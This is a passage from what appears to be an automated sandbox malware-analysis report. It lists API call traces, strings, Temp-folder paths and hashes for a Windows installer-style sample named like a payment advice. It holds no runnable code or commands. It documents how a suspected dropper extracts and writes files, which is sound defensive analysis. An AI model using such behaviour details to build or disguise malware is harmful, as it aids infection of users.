                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                          • String ID: CB@$Call$N$open
                                                                                                                                          • API String ID: 3615053054-4184941720
                                                                                                                                          • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                          • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                                                                          • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                          • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                                                                          APIs
                                                                                                                                          • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                                                            • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                            • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                                                          • wsprintfA.USER32 ref: 00405C80
                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                                          • API String ID: 1265525490-3322868524
                                                                                                                                          • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                                          • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                                          • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                                          • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                                          APIs
                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                          • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                          • String ID: F
                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                          • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                          • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                                          • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                          • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                                          APIs
                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061E1
                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061F5
                                                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 00406208
                                                                                                                                          Strings
                                                                                                                                          • "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe", xrefs: 004061C2
                                                                                                                                          • *?|<>/":, xrefs: 004061D0
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040617F, 00406184
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                          • API String ID: 589700163-614586876
                                                                                                                                          • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                          • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                                          • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                          • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nsh2473.tmp$C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll
                                                                                                                                          • API String ID: 1453599865-3664944449
                                                                                                                                          • Opcode ID: ba053f0344776bd3916354cbd0a68f7896d065c86eb027949be49280e87f23d6
                                                                                                                                          • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                          • Opcode Fuzzy Hash: ba053f0344776bd3916354cbd0a68f7896d065c86eb027949be49280e87f23d6
                                                                                                                                          • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                          APIs
                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                                          • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                          • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                          • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                                          APIs
                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                            • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                                          • String ID: 9
                                                                                                                                          • API String ID: 1149667376-2366072709
                                                                                                                                          • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                          • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                                          • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                          • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                                                          APIs
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3294113728-0
                                                                                                                                          • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                          • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                                          • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                          • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                          • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                          • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                          • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                          • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                                          • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                                                          • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                                          • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                                                          APIs
                                                                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                                          • wsprintfW.USER32 ref: 00402D81
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(00000000,00000064,00001794), ref: 00402D13
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                          • String ID: ... %d%%
                                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                                          • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                          • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                                                          • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                          • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                                                          APIs
                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                                                          • GetMessagePos.USER32 ref: 00404A81
                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404A9B
